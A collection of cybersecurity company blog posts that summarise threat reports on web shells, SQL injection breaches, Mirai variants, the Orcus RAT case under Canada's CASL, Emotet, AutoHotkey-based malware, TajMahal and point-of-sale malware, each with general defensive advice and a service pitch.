Thought leadership. threat analysis, news and alerts.
Web Shell Malware Facilitates Cybercriminals' Access to Victims’ Networks, New Report Shows
A recent report from the national security agencies in Australia and the US showed that cybercriminals are increasingly using web shell malware to access victims’ networks.
In a joint advisory, Australia’s national security agency, the Australian Signals Directorate (ASD), and its counterpart in the US, the National Security Agency (NSA) said that cybercriminals have increased the use of web shell malware for computer network exploitation.
"Web shell malware can facilitate cyber attackers' access to a network where they are able to execute arbitrary system commands, enumerate system information, steal data, install additional malicious software or use the infected server to pivot further into the network," the ASD said in a separate statement. The NSA, meanwhile, said in a separate statement, “Malicious cyber actors have increasingly leveraged web shells to gain or maintain access on victim networks.”
What Is Web Shell Malware?
Web shell malware is a type of malicious software that’s deployed by an attacker on a compromised web server – referring to a software to which web browsers connect to run web applications. A web application, meanwhile, refers to a set of code written to perform certain action or actions on a web server and display the result to a web browser.
An example of a web shell malware is China Chopper, a malware that allows attackers to execute various commands on the server, including dropping other malware. First found in the wild in 2012, this web shell malware uses a simple and short code that can be deployed on the target web server by simply typing it with no file transfer needed. Due to the malware’s simple code and ease of use, security researchers have difficulty in connecting this malware to any particular threat actor or group.
Preventive and Mitigating Measures Against Web Shell Malware?
The national security agencies in Australia and the US recommend the following preventive and mitigating measures against web shell malware:
1. Web Application Update
Web shell malware is often created by making changes to a file in a legitimate web application. Attackers are able to make malicious changes to legitimate web applications due to the failure of the users’ to apply in timely manner patches to known security vulnerabilities in web applications.
According to the national security agencies in Australia and the US, web application updates need to be prioritized as attackers sometimes target vulnerabilities in internet-facing and internal web applications within 24 hours of a patch release.
2. Early Detection Methods
Web shell malware is hard to detect using typical detection methods as malware creators hide their creation using encryption and obfuscation. “Known-Good” comparison and monitoring anomalous network traffic are some of the suggested measures.
In known-good comparison, a verified version of a web application is compared to your organization’s on-hand version of the web application. Discrepancies between the verified version and the on-hand version need to be manually reviewed.
Depending on the attacker, any of the following could be indicators of anomalous network traffic resulting from web shell malware: unusually large responses (an indicator of data exfiltration), recurring off-peak access times typically during non-working hours, and request from unlikely geographical location (an indicator of a foreign threat actor).
3. Harden Web Application Permissions
According to the national security agencies in Australia and the US, web applications shouldn’t have permission to write directly to a web accessible directory or modify web accessible code. The national security agencies said that malicious actors are unable to upload a web shell to a vulnerable web application if the web server blocks access to the web accessible directory.
In February of this year, Microsoft reported that attackers uploaded a web shell in multiple folders on the web server owned by an organization in the public sector. "DART’s [Microsoft’s Detection and Response Team] investigation showed that the attackers uploaded a web shell in multiple folders on the web server, leading to the subsequent compromise of service accounts and domain admin accounts,” Microsoft said. “This allowed the attackers to perform reconnaissance using net.exe, scan for additional target systems using nbtstat.exe, and eventually move laterally using PsExec.”
4. Use Intrusion Prevention
The use of Web Application Firewall (WAF) adds an extra layer of defence for web applications by blocking some known attacks. Attackers, however, have been known to evade this signature-based blocking, as such, this approach should only be part of the whole cybersecurity measures. WAF has also been known to block the initial compromise but is unlikely to detect web shell traffic.
5. Network Segmentation
Network segmentation refers to the practice of dividing a network into sub-networks. This practice ensures that in case a particular sub-network is compromised by attackers, the other sub-networks won’t be affected.
For instance, it’s important to put in place in one sub-network internet-facing servers. The practice of network segmentation blocks web shell propagation by preventing connections to other sub-networks. “While web shells could still affect a targeted server, network segmentation prevents attackers from chaining web shells to reach deeper into an organization’s network,” the national security agencies in Australia and the US said.
6. Harden Web Servers
Securing the configuration of your organization’s web servers can prevent the deployment of web shell malware. As additional measures to harden web servers, the national security agencies in Australia and the US recommend that access to unused ports or services should be blocked, and routine vulnerability scanning should be conducted to identify unknown weaknesses in an environment.
Threat Actors Continue to Target Websites
The European Central Bank (ECB) shut down one of its websites following the discovery that malicious actors accessed the site without authority and infected it with malicious software (malware). This incident shows that threat actors continue to target websites.
ECB, in a statement, said that unauthorized parties had breached the Bank’s Integrated Reporting Dictionary (BIRD) website, a site purposely built to provide the banking industry with details on how to produce statistical and supervisory reports. The Bank said that contact data, including email addresses, names and position titles of 481 subscribers to the BIRD newsletter may have been stolen by the attackers.
ECB, in a statement, said that the attack on BIRD website was discovered as a result of a “regular maintenance work”. An ECB spokesman told Reutersthat the earliest evidence found of the website attack dated back to December 2018, which means that the attack had gone unnoticed for months before being discovered during maintenance work.
This isn’t the first time that ECB reported an attack on its IT infrastructure. In 2014, ECBdisclosed that an unknown attacker or attackers had breached another of the Bank’s website used for registrations for events of the Bank such as conferences and visits.
The 2014 website attack, the Bank said, led to the theft of email addresses and other contact data left by individuals registering for events at the ECB. This 2014 attack in one of the Bank’s website was only known after an anonymous email was sent to the Bank asking for financial compensation in exchange for the data stolen.
In the latest attack on one of its websites, ECB said the attackers “succeeded in injecting malware onto the external server to aid phishing activities”. In the 2014 attack, ECB said the malicious actor or actors attacked a “database serving its public website”. Beyond those phrases, not much is known in the “injection” and “database” attacks.
The Open Web Application Security Project (OWASP)lists injection attacks as the number one threat to web security. Injection attacks refer to a broad attack paths that allow attackers to gain access to the database records of vulnerable websites. In certain cases, this type of attack allows attackers to gain administrative rights to a database.
One example of an injection attack is the SQL injection, also known as SQLI, attack. SQL, which stands for Structured Query Language, is a programming language understood by databases. By inserting malicious commands from this programming language into input fields on websites such as input forms, attackers can gain access to the database records of vulnerable websites, resulting in the unauthorized access of any data available in the database.
In late 2007 and early 2008, thousands of websites were defaced as a result of SQL injection attacks. According to researchers at Microsoft, These particular SQL injection attacks didn’t exploit vulnerabilities in Windows, IIS, SQL Server, or other infrastructure code; rather, it exploited vulnerabilities in custom web applications running on this infrastructure. Thousands of websites were affected due to 2 factors: first, there was an automated tool to launch this attack, and second, this SQL attack tool spread through the use of a botnet.
SANSreported that thousands of websites were compromised in late 2007 and early 2008 as the attacker or attackers used an automated tool in search engines to find vulnerable web applications and exploiting them. “The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site,” SANS reported. SecureWorks, meanwhile, reported that the automated SQL attack tool, spread to thousands of websites as the attackers relied on a botnet – a group of computers or devices infected by the same malware and controlled by an attacker for malicious purposes such as in this case the spread of SQL attack tool.
Other than using SQL injection to attack indiscriminate websites using an automated tool and a botnet, SQL injection has also been used by attackers in targeted attacks. According to the U.S. Federal Bureau of Investigation (FBI), a malicious group obtained confidential information from Sony Pictures’ computer systems on May 27, 2011 to June 2, 2011 using an SQL injection attack against Sony Pictures’ website.
According to the UK's Information Commissioner's Office, SQL injection was also used in the TalkTalk cyber attack on the company’s website. As a result of the SQL injection attack on TalkTalk’s website, personal details of 156,959 customers, including their names, addresses, dates of birth, phone numbers and email addresses were stolen. The attacker also stole the bank account number and sort code of 15,656 TalkTalk’s customers.
As shown in above-mentioned examples, injection attacks on websites are highly detrimental to the affected organizations. Loss of customer trust is one potential cost of an SQL injection attack should personally identifiable information such as full names, addresses and credit card details be stolen.
One of the cyber security measures, in order to prevent injection attacks such as SQL injection attacks, is through the use of a web application firewall (WAF). A WAF is often used to filter out injection attacks such as SQL injection attacks. In filtering out SQL injection attacks, a WAF uses a list that contains signatures to address specific attack vectors. This WAF is regularly updated to provide new filtering rules for newly discovered security vulnerabilities.
At The Driz Group, we specialize in protecting your websites and web applications with instant attack mitigation and a guaranteed DDoS protection. We support all deployment types including Cloud and on-premise. Setup take several minutes and there is nothing to buy, support, or maintain.
Connect with ustoday for a free consultation and protect your websites, web applications, online reputation and mission critical data.
Mirai Malware Variants Increasingly Targeting Enterprise IoT Devices
Malware variants that evolved from the original Mirai malware are increasingly targeting enterprise IoT devices, putting at risk enterprise networks from being exploited for nefarious activities such as distributed denial-of-service (DDoS) attacks and illicit cryptocurrency mining, as well as putting at risk enterprise cloud architecture from additional malware and further compromise.
Tracking the Mirai
The original Mirai malware was created by Paras Jha, Josiah White and Dalton Norman. The 3 creators of the Mirai malware in due course were arrested and sentenced by U.S. authorities. Prior to their arrest and sentencing, the source code of the Mirai malware was publicly released. The publication of the source code propelled the creation of multiple versions of Mirai to propagate in the wild.
Mirai was first observed in the wild in 2016. The Mirai malware gained notoriety when the malware was used by the still unidentified attacker or attackers in launching a distributed denial-of-service (DDoS) attack on Dyn DNS, amajor dynamic DNS provider, which resulted in the widespread internet outages across the U.S. and Europe2016.
According to the IBM X-Force researchers, since 2016, there have been 63 Mirai variants observed in the wild. The researchers said that the multiple variants of Mirai have been used to perform nefarious activities such as DDoS attacks and illicit cryptocurrency mining.
In a DDoS attack, attackers overwhelm a target, such as a website or in the case of Dyn DNS, adynamic DNS provider, with voluminous traffic, bringing the target offline and rendering it inaccessible to legitimate users. Illicit cryptocurrency mining, meanwhile, refers to the use of the computing power without the knowledge and consent of the computer owner.
The Mirai malware variants are able to perform DDoS attacks and illicit cryptocurrency mining by infecting computers with security vulnerabilities and enslaving these infected computers to form as an army, also known as botnet, and perform activities such as DDoS or cryptocurrency or other activities according to the whim of the attacker controlling the botnet. The Mirai malware is a powerful tool for malicious actors as this malware allows them to automate the process of downloading any number of malware onto a large number of IoT devices.
Owners of IoT devices typically don’t consider these devices as computers. These devices are often installed and then forgotten. Unlike other computers such as desktops or laptops, IoT devices aren’t monitored for irregular behaviour, nor updated or their login details changed.
The original malware created by Jha, White and Norman infected hundreds of thousands of IoT devices, such as routers and security cameras and controlled these infected devices to form an army or a botnet to perform illegal activities such as DDoS attacks. The creators of the original malware were able to infect hundreds of thousands of IoT devices knowing that many IoT owners don’t bother to change the factory default logins details of these devices. The original Mirai uses 61 factory default login details in infecting IoT devices.
Enterprise IoT Devices at Risk
IBM X-Force researchers, which have been tracking Mirai campaigns since 2016, said that the Mirai variants’ tactics, techniques and procedures (TTPs) are now targeting enterprise IoT devices.
“Nowadays, enterprise IoT devices are everywhere, from instruments that monitor patients in hospitals, to wireless devices in smart meters that relay information to utility companies, to robots in warehouses that constantly deliver inventory information,” IBM X-Force researchers said. “Enterprises are increasingly dependent on IoT devices to run day-to-day operations, and attackers are well-aware of the growing attack surface.”
“As IoT devices become more common among households and large organizations, Mirai and its variants will continue to evolve to adapt to the changing environments and targets of its choice,” IBM X-Force researchers added.
The researchers observed that creators of the Mirai malware variants were dropping additional malware onto the infected devices, with cryptocurrency malware leading the way. Cryptocurrency malware, which steals the computing power of infected IoT devices to generate money for the attackers, are harmful to IoT devices as these devices are prone to overheating as these devices have little computing power compared to desktop or laptop computers with central processing unit (CPU) or graphics processing unit (GPU) resources. IBM X-Force researchers also observed that creators of Mirai malware variants were dropping steganography, which hides malicious code in images that trigger the download of additional malware.
The researchers also said that the Mirai malware variants pose a threat to cloud computing as IoT devices infected with Miral malware variants that are connected to cloud architecture could allow attackers to gain access to cloud servers. Once these malicious actors gain access to cloud servers, they could drop additional malware, the IBM X-Force researchers said.
In early 2009, researchers at Palo Alto Networks' Unit 42discovered a variant of the Mirai malware targeting WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs–IoT devices used by businesses. Targeting IoT devices used by businesses, according to researchers at Palo Alto Networks' Unit 42, gives attackers a large attack surface as IoT devices used by businesses have larger bandwidth, giving the attackers greater firepower for attacks such as DDoS attacks.
As malicious actors are increasingly targeting enterprises IoT devices, it’s important to change the factory default usernames and passwords of these devices and to install the latest security update. If the IoT vendor no longer issues security updates or it isn’t possible to install security updates on these devices, it’s best to remove these devices from your organization’s network.
Get in touchwith our experts for additional threat information and to help you mitigate cybersecurity risks.
Canada’s Anti-Spam Legislation (CASL) Goes After Malware Distributors
Canada’s Anti-Spam Legislation (CASL), the federal law which took effect in 2014, proves to be more than an anti-spam legislation with the recent application of the law of going after malicious actors spreading malicious software (malware).
The Canadian Radio-television and Telecommunications Commission (CRTC), in tandem with the Royal Canadian Mounted Police (RCMP), on March 27, 2019 executed a warrant at the home of a Toronto software developer behind the remote access trojan (RAT) called “Orcus”. Remote access trojan, in general, is a type of malware that facilitates covert and unauthorized remote access, enabling a malicious actor to access someone else's computer, no matter where this computer is geographically located, and make changes to this computer without the owner’s consent.
What Is Canada’s Anti-Spam Legislation (CASL)?
Canada’s Anti-Spam Legislation (CASL), which amended the Canadian Radio-television and Telecommunications Commission Act, covers more than just spam emails. Pertinent provisions of the law include:
Section 6: It is prohibited to send or cause or permit to be sent to an electronic address a commercial electronic message unless the person to whom the message is sent has consented to receiving it, whether the consent is express or implied.
Section 7: It is prohibited, in the course of a commercial activity, to alter or cause to be altered the transmission data in an electronic message so that the message is delivered to a destination other than or in addition to that specified by the sender, unless the alteration is made with the express consent of the sender or the person to whom the message is sent; or the alteration is made in accordance with a court order.
Section 8: A person must not, in the course of a commercial activity, install or cause to be installed a computer program on any other person’s computer system or, having so installed or caused to be installed a computer program, cause an electronic message to be sent from that computer system, unless the person has obtained the express consent of the owner or an authorized user of the computer system; or the person is acting in accordance with a court order.
Section 9: It is prohibited to aid, induce, procure or cause to be procured the doing of any act contrary to any of sections 6 to 8.
The maximum penalty for violating CASL is $1,000,000 in the case of an individual, and $10,000,000 in case the violator is an organization.
What Is Orcus RAT?
While authorities refused to name the subject of the March 27, 2019 CRTC warrant, the person who calls himself “Armada” said in a statement that his organization called “Orcus Technologies” was the subject of the said warrant. Since early 2016, Orcus Technologies has marketed Orcus RAT as a legitimate remote administration tool – a software that gives a person full access to a computer as if the person had physical access to the device.
Armada said authorities seized numerous backup hard drives which contained a large portion of Orcus Technologies business, including user information inclusive of user names, real names and financial transactions. As a result of the seizure, Armada said Orcus RAT is no longer a “safe or secure solution to Remote Administrative needs”.
One stand out feature of the Orcus RAT is its capability to load custom plugins built by users, as well as plugins that are available from the Orcus repository. While Orcus Technologies claims that Orcus RAT is a legitimate remote administration tool, it listed on its website capabilities that are beyond the scope of a legitimate remote administration tool such as disabling the light indicator on webcams in order not to alert the target that it’s enabled; restarting the server component or triggering a Blue Screen of Death (BSOD) if someone tries to kill its process and a plugin that can be used to perform distributed denial-of-service (DDoS) attack.
Orcus RAT also features capabilities such as password retrieval and key logging that are normally not seen in legitimate remote administration tools but only seen in remote access trojans, which facilitate covert and unauthorized remote access.
One such remote access trojan, which facilitates the installation of the Orcus RAT, was unleashed in December 2017 via a phishing campaign – a type of cyber-attack that uses spam emails as a weapon. The said spam emails arrived at the email inboxes of targeted bitcoin investors offering Gunbot, a trading automation software for cryptocurrencies. These spam emails contained an attachment. Analysis by researchers at Fortinetshowed that when this attachment is clicked by the recipient, it downloads from a specific URL a file that contains the malware and embedded in this malware is the Orcus RAT.
The Orcus RAT malware in this case, Fortinet researchers said, resulted in the loss of cryptocurrency investments and more. “In our investigation of Orcus RAT, we have again proven again that its capabilities go beyond the scope of a harmless administration tool,” the researchers said. “Regardless of the developer’s claim and defense, the reality is that the application is being used in cybercrime campaigns.”
CRTC Director Neil Barratt told KrebsOnSecuritythat CASL gives authorities a leeway to get malicious actors off the networks in Canada and elsewhere as the burden of proof required in CASL is lower than a criminal conviction.
“We’re dealing with a lower burden of proof than a criminal conviction, and CASL gives us a little more leeway to get bad actors off our networks in Canada and to ultimately improve security for people here and hopefully elsewhere,” Barratt said. “We have great power in CASL and Section 9 makes it a violation to aid in the doing of a violation. And this extends quite broadly, across email service providers and various intermediaries.”
Malicious Email Campaigns Geo-Targets Canadian Organizations, Report Says
Canadian organizations are increasingly becoming the targets of cyber-attackers as shown in the recent discovery of nearly 100 malicious email campaigns specifically targeting organizations based in Canada.
In the report "Beyond 'North America' - Threat actors target Canada specifically" researchers at Proofpoint reported that between the period of January 1, 2019 to May 1, 2019, threat actors conducted nearly 100 malicious email campaigns specifically targeting Canadian organizations or were customized for Canadian audiences.
Malicious Email Campaigns
Malicious email campaign, also known as phishing scam, is a type of cyber-attack that uses emails as a weapon. Phishing emails contain malicious attachments or malicious links.
Downloading this malicious attachment or clicking this malicious link could lead to compromise. Victims are tricked into opening the malicious email and downloading this malicious attachment or clicking this malicious link as threat actors use branding familiar to the recipients.
In the recent malicious email campaigns detected by Proofpoint researchers, the top affected organizations in Canada include financial services, energy/utilities, manufacturing, healthcare and technology. The researchers also observed that some of the malicious emails sent were customized for the French-speaking recipients in Canada.
In the nearly 100 malicious email campaigns specifically targeting Canadian organizations, Proofpoint researchers also observed that the threat actors tricked the victims into opening the malicious email or downloading the malicious attachment or clicking the malicious link by stealing the branding of several notable Canadian companies and agencies including national banks, major shipping and logistics organizations and government agencies.
“Emotet in particular, with its frequent region-specific email campaigns, is bringing new attention to geo-targeting in Canada …,” Proofpoint researchers said.
The first version of the malicious software (malware) Emotet, which was first observed in 2014 targeting German and Austrian victims, functioned as a banking trojan – a type of malware designed to steal financial data.
Since then, Emotet has evolved into a powerful malware, with its ability to continuously evolve and update its capabilities for various online criminal activities from information stealing to distributed denial-of-service (DDoS) attacks. In recent years, instead of delivering its own banking trojan, Emotet has delivered third-party banking trojans such as Qbot, The Trick, IcedID and Gootkit.
In 2018, the United States Computer Emergency Readiness Team (US-CERT)issued an alert, warning about the dangers of Emotet. "Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” US-CERT said. “Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”
One of the reasons why Emotet continues to be among the most costly and destructive malware is its worm-like capability, that is, the ability to spread from computer to computer without any human action.
Emotet has been known to spread from computer to computer without any human interaction by accessing Server Message Block (SMB), an internet standard protocol that Windows uses to share files, printers and serial ports. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US-CERT said.
Emotet is also capable of spreading its own phishing email without human interaction through the use of Outlook scraper, a tool that’s used to scrape names and email addresses from the victim’s Outlook accounts and uses this names and email addresses to send out additional phishing emails from the compromised accounts.
According to Proofpoint researchers, the threat actor called “TA542” is the primary actor behind Emotet. Proofpoint researchers said that this threat actor is known to use the latest version of Emotet and develops malicious emails specific to given regions in the world.
"TA542 typically distributes high volume email campaigns consisting of hundreds of thousands or even millions of messages targeting all industries,” Proofpoint researchers said. “TA542 is currently one of the most prolific actors in the entire threat landscape. With TA542’s international reach and high volume campaign strategy, we expect Emotet use to continue to grow in the upcoming quarters.”
Even as Emotet has evolved in terms of capabilities, one thing remains constant with this malware: delivery is always via malicious email. As the delivery is always via malicious email, it’s important to protect your organization’s email system from this threat through the following mitigating measures:
Here are additional cyber-security measures in order to block or mitigate the effects of Emotet:
Timely identification and mitigation of IT risks can save your business from suffering costly consequences. Call us todayand we will show you how to better protectyour staff and your sensitive information against targeted attacks.
Legitimate Windows Tool AutoHotkey Now Part of Cyber Attackers Arsenal to Avoid Detection
Researchers at Trend Micro have discovered a new malicious software (malware) that uses the AutoHotkey – a Microsoft Windows tool initially aimed at providing easy keyboard shortcuts, enabling attackers to avoid detection, steal certain information and even gain remote control to a compromised computer.
This latest malware, according to Trend Microresearchers, initially infects a computer via a spear phishing attack, a form of a targeted cyber-attack that uses an email as a weapon. The malicious email used by the attackers contains a malicious attachment in the form of a disguised legitimate Excel file.
According to the researchers, at first glance, this disguised Excel file has only one filled sheet. Upon scrutiny, however, this file has another sheet with two blank columns. Upon closer look, the attackers had written malicious code on these two columns using white font, hiding the code in plain view.
Once the email receiver enables macro to open the disguised Excel file, AutoHotkey is then dropped onto the victim’s computer. The researchers said that the legitimate tool AutoHotkey allows the attackers to connect to the server that they control every 10 seconds to download, save and execute script files.
AutoHotkey, in this case, downloaded and executed TeamViewer, a software that allows attackers to gain remote control over the compromised computer. The researchers noted that AutoHotkey can download and execute other script files depending on the command it receives from the server controlled by the attackers.
Other malicious acts activated via AutoHotkey in this newly discovered malware include the creation of a link file in the startup folder for AutoHotkeyU32.exe, allowing the attack to persist even after a system restart, and the sending of the volume serial number of the C drive, which allows the attacker to identify the victim’s computer.
“We have yet to conclude this attack’s exact purpose,” researchers at Trend Micro said. “For now, we can surmise that it has the makings of a potential targeted attack because of its cyber espionage capabilities, as well as the potential for delivering ransomware and coinminer.”
History of AutoHotkey
AutoHotkey software is a free, open-source scripting language that was initially developed at providing easy keyboard shortcuts for Windows. This software, later on, evolved into something more than providing easy keyboard shortcuts as it allows Windows users to automate any desktop tasks, including monitoring programs, setting up scheduled tasks, and automating repetitive operations inside third-party software. The software was initially released 10 years ago, with the stable release of the software done only in November 2018.
The evolution of AutoHotkey made it an attractive tool for attackers. AutoHotkey, also known in the online gaming community as AHK, has been used numerous times in creating online game cheating tools. Beyond the gaming world, cyber attackers with varied criminal intents have made AutoHotkey as an addition to their attack arsenal.
An example of malware that abuses AutoHotkey is the malware called “Win32/Ahkarun.A”, an AutoHotKey compiled script that spreads itself without any human interaction through removable drives and sends the user's IP address to a remote server. According to Microsoft, which reported about the malware in June 2008, Ahkarun uses the common icon resembling a Windows file folder in order to trick a user into opening and executing the malware.
Once executed on the victim’s computer, this malware then awaits connections of removable media such as USB thumb drives, and when this happens the malware copies itself and components to the removable drive, and as a result performing malicious actions such as identifying the IP address of the infected machine and sending the obtained IP address to a predefined email account.
In February 2018, the research team at Ixiareported two cases of AutoHotkey-based malware, one distributing an cryptocurrency mining malware and the other distributing a clipboard hijacker. In cryptocurrency mining, an attacker hijacks the computing power of someone else’s computer for cryptocurrency mining. In clipboard hijacking, meanwhile, in the AutoHotkey-based malware discovered by the Ixia research team stays in the compromised computer’s memory and awaits for any activity in the clipboard. When a user inputs into the clipboard a cryptocurrency wallet address, the malware replaces the user’s cryptocurrency wallet address to the address owned and controlled by the attacker, thus tricking the victim into sending cryptocurrency to the attacker instead.
In March 2018, researchers at Cybereasondiscovered an AutoHotkey-based malware they called “Fauxpersky” as this malware masquerades as Kaspersky Antivirus and spreads through infected USB drives. Fauxpersky has a keylogging feature, recording every keystroke made by a computer user, exfiltrating the data recorded through Google Forms and depositing it in the attacker’s inbox.
As shown in the above-mentioned examples of AutoHotkey-based malware, criminals are starting to abuse legitimate Windows tool AutoHotkey. Being a legitimate Windows tool, often used by system administrators, AutoHotkey flies under the radar and drops a varied range of payloads – part of the malware that performs malicious actions – without triggering any anti-malware alarms.
One of the reasons why we see lesser abuses of AutoHotkey by cyber attackers, to date, is due to the fact that this software isn’t pre-installed on Windows computers. Attackers, therefore, have to take an extra step of dropping the software onto the victim’s computer and executing it in order for this tool to work.
Training your organization’s staff to recognize, avoid and report suspicious emails is one approach that could prevent AutoHotkey abuses. As exemplified in the newly discovered AutoHotkey-based malware, attackers initially infect their victims through phishing attacks, a type of cyber attack that utilized emails as a weapon.
Another approach in preventing AutoHotkey abuses is by disabling your organization’s active content (data connections or macros). When active content is disabled, the next time your organization’s staff receives an active content via email, this content can’t be opened and the Message Bar with the notice "Macros have been disabled” will then appear as an alert that the active content may contain malware and other security hazards that could harm your organization’s computer or network.
Why TajMahal Is the Most Alarming Malware to Date
The discovery of the malware called “TajMahal” is alarming, not because it attacked a certain diplomatic organization but because of the high number of malicious acts that it can do, totaling 80, and the malware’s stealth capability, evading discovery for nearly 5 years.
Researchers at Kaspersky Labrecently revealed that a diplomatic organization belonging to a Central Asian country, a type of organization that’s often subject to cyber-attack due to its line of work, was a victim of the malicious software (malware) TajMahal. This malware, the researchers said, remained undetected in the diplomatic organization’s network for nearly 5 years, with the first known legitimate sample timestamp from August 2013 and the last one from April 2018. The first confirmed date when TajMahal samples were seen on a victim’s machine is in August 2014. The researchers said they first discovered the malware on the victim’s machine in the autumn of 2018.
Old and New Hacking Tools
According to Kaspersky Lab researchers, TajMahal malware comes in two packages, one package is named “Tokyo” and the other “Yokohama”. Tokyo and Yokohama, the researchers said, share the same code base found on all infected computers of the said diplomatic organization. The Tokyo package facilitates the first stage of the malware infection, while the Yokohama package facilitates the deployment of the staggering 80 malicious cyber activities.
The Tokyo package uses PowerShell script, an old and tested strategy used by cyber attackers. McAfee Labsreport found that PowerShell attacks increased between 2016 and 2017, and IBM X-Forcealso noted the growth of PowerShell attacks from October 2017 to October 2018.
PowerShell is a legitimate tool used by system administrators in simplifying and automating the management of Microsoft Windows and Windows Server. Malicious actors, meanwhile, use PowerShell to hide their malicious code as the code is executed directly from the computer memory, making the attack fileless and thus stealthier than other types of attacks. PowerShell also allows remote access – the ability to access a computer from anywhere in the world so long as the computer is connected to the internet.
Yokohama, meanwhile, unleashes payloads – the portion of the malware which performs malicious actions, of which 80 of them were uncovered by Kaspersky Lab researchers. Old hacking techniques that form part of the Yokohama package include keylogging and audio, screen and webcam grabbing. In keylogging, every keystroke made by a computer user is recorded and sent to the malicious actors. In audio, screen and webcam grabbing, screenshots, audio or video, for instance, from VoIP audio or video calls, are covertly recorded and the sent to malicious actors.
Aside from the slew of time-tested hacking tools, Yokohama package, in particular, and TajMahal in general, packed the following new hacking capabilities:
Intercepting documents from print queue and stealing data from CD burnt and USB stick are particularly alarming as documents that are typically printed or copied to a CD or USB stick are sensitive and important. Any data stolen by the malware, whether text, audio, video or image, is then sent to the command and control server, a computer controlled by the attackers in the form of an XML file called "TajMahal" – the origin of the name of the malware.
According to the researchers at Kaspersky Lab, it’s not known how the TajMahal malware initially infected the diplomatic organization belonging to a Central Asian country. It isn’t also known is who is the individual or groups behind the TajMahal malware as this malware bears no resemblance with other known malware, which means that the attacker or attackers created this malware using new code base to evade detection. Anti-malware solutions typically block malware that bears small resemblance with other known malware.
To date, the only known victim of the TajMahal malware is the diplomatic organization. According to the researchers at Kaspersky Lab, it’s unlikely that the attackers went all that trouble of creating a new malware just for one victim, and that the likely theory is that there are other victims that have yet to be identified. The researchers said that this theory is supported by the fact that they “couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected”.
TajMahal malware is a type of malware that shows the characteristics of an advanced persistent threat (APT), a cyberattack in which the attacker or attackers gain unauthorized access to a network and remain undetected for a prolonged period. The usual suspects of APT attacks are nation-state actors – individuals who have the “license to hack” on behalf of a particular nation or state to gain access to valuable data or intelligence and can create cyber incidents that have international significance.
In recent years, however, common cyber criminals, those whose motive is simply for profit, have gotten hold of the APT tools used by nation-state actors, making these APT tools part of their arsenal in attacking, not just large organizations but also small and medium-sized organizations – attacks that rendered these organizations vulnerable.
For instance, the APT hacking tool called “EternalBlue” has joined a long line of reliable favorites of common cyber criminals. EternalBlue is one of the hacking tools leaked publicly in 2017 by the group known as “Shadow Brokers”. This hacking tool is believed to be created by the U.S. National Security Agency (NSA) for its surveillance activities. A month before the public release of EternalBlue, Microsoft issued a security update, fixing the vulnerability exploited by EternalBlue.
This particular security update, however, wasn’t timely installed on hundreds of thousands of computers worldwide, leading to the successful unleashing of WannaCry, a malware that uses the EternalBlue hacking tool in exploiting the vulnerabilities in the Windows SMBv1 server (patched by Microsoft a month earlier), remotely encrypting files and locking users out of their own files and spreading it to other computers within a network without user interaction. Since the EternalBlue leak, many malware integrated the EternalBlue feature.
Combating malware and ATP threats has become a daily reality for many organizations. It requires specialized skills and resources. When your organization needs help, our cybersecurity experts a phone call away. Contact ustoday.
POS Malware Continues to Target Small and Medium-Sized Businesses
Two organizations, Flashpoint and Cisco Talos, recently revealed that point-of-sale (POS) malware continues to be a threat to small and medium-sized businesses.
What Is a Point-of-Sale (POS) Malware?
A point-of-sale (POS) malware is a malicious software that particularly targets POS, a system used for credit card transaction for payment of goods or services. Attackers may install a POS malware physically by tampering the PIN entry device pads or swapping out devices, an attack known as payment card skimming.
Another way of installing the POS malware is through remote installation, that is, the installation of a malware on environments where card-present retail transactions are conducted using a different computer stationed in another location. This present blog post covers the remote POS intrusion.
The goal of a POS malware is to obtain credit card details from customers. Stolen credit card details are typically sold by cyber criminals on the dark web. Buyers use these stolen credit card details to commit credit card fraud – unauthorized charges on someone else’s credit card.
Flashpoint researchers reported that the POS malware called DMSniff has been actively used by cyber criminals since at least 2016 against small and medium-sized businesses in the restaurant and entertainment industries. Similar to other POS malware, DMSniff harvests credit card details. Flashpoint researchers said the DMSniff malware was previously only sold privately.
One feature of DMSniff that’s rarely seen in POS malware, Flashpoint researchers noted is the use of domain generation algorithm (DGA), a feature that creates lists of command-and-control domains or webpages on the fly. Command-and-control domains are important to cyber criminals as malware typically receive commands and send stolen data via these domains.
To cripple the effectiveness of a malware, that is, preventing the malware to receive commands or share stolen data, law enforcement or hosting providers take down these malware command-and-control domains. With domain generation algorithm, attackers can create lists of command-and-control domains on the fly in case one domain is taken down. In addition, domain generation algorithm also bypasses weak blocking mechanisms.
Cisco Talos researchers, meanwhile, reported about the proliferation of the new POS malware called GlitchPOS. The sale of this malware opened a few weeks ago in one of the crimeware forums. This malware later turned up for sale in another crimeware forum. The author of the GlitchPOS malware even created a video, showing how this malware harvests credit card details.
Like other POS malware, the main purpose of GlitchPOS is to steal credit card details from the memory of the infected system. Unlike DMSniff, with its advanced domain generation algorithm feature, GlitchPOS contains few functions, such as connecting to the command-and-control server to do the following tasks: register the infected systems, exfiltrate credit card numbers from the memory of the infected system, update the "encryption" key and clean itself. Online services such as Dropbox and Google Drive are at times used by cyber criminals as command-and-control servers.
Verizon’s 2018 Data Breach Investigations Reportfound that the accommodation and food services industry was the hardest sector in terms of remote POS intrusion in 2018, with remote POS breaches 40 times more likely to occur on the accommodation and food services industry compared to other industries.
The 2018 Verizon report added that remote POS intrusions weren’t discovered for months in 96% of cases. They were only discovered via external sources such as detection as a Common Point of Purchase (CPP) or by law enforcement.
In February this year, North Country Business Products (NCBP), a Minnesota-based provider of point-of-sale products, disclosed that nearly 140 of its customers, mostly bars, restaurants, and coffee shops all over the US, have had POS systems infected with malware.
Causes of Remote POS Intrusions
Here are some of the common causes of remote POS intrusions:
SSH Brute Forcing & Common Exploit Scanners
In the case of DMSniff malware, Flashpoint researchers suspected (with low confidence) that the initial infection could either be SSH brute forcing or common exploit scanners.
In SSH brute forcing, an attacker tries every possible password combination until it cracks the password of SSH, also known as Secure Shell or Secure Socket Shell, a network protocol that gives users, particularly system administrators, a means to access a computer over the internet. Common exploit scanners, meanwhile, are automated tools that are used to test applications and networks against known and new security vulnerabilities.
Supply Chain Attack
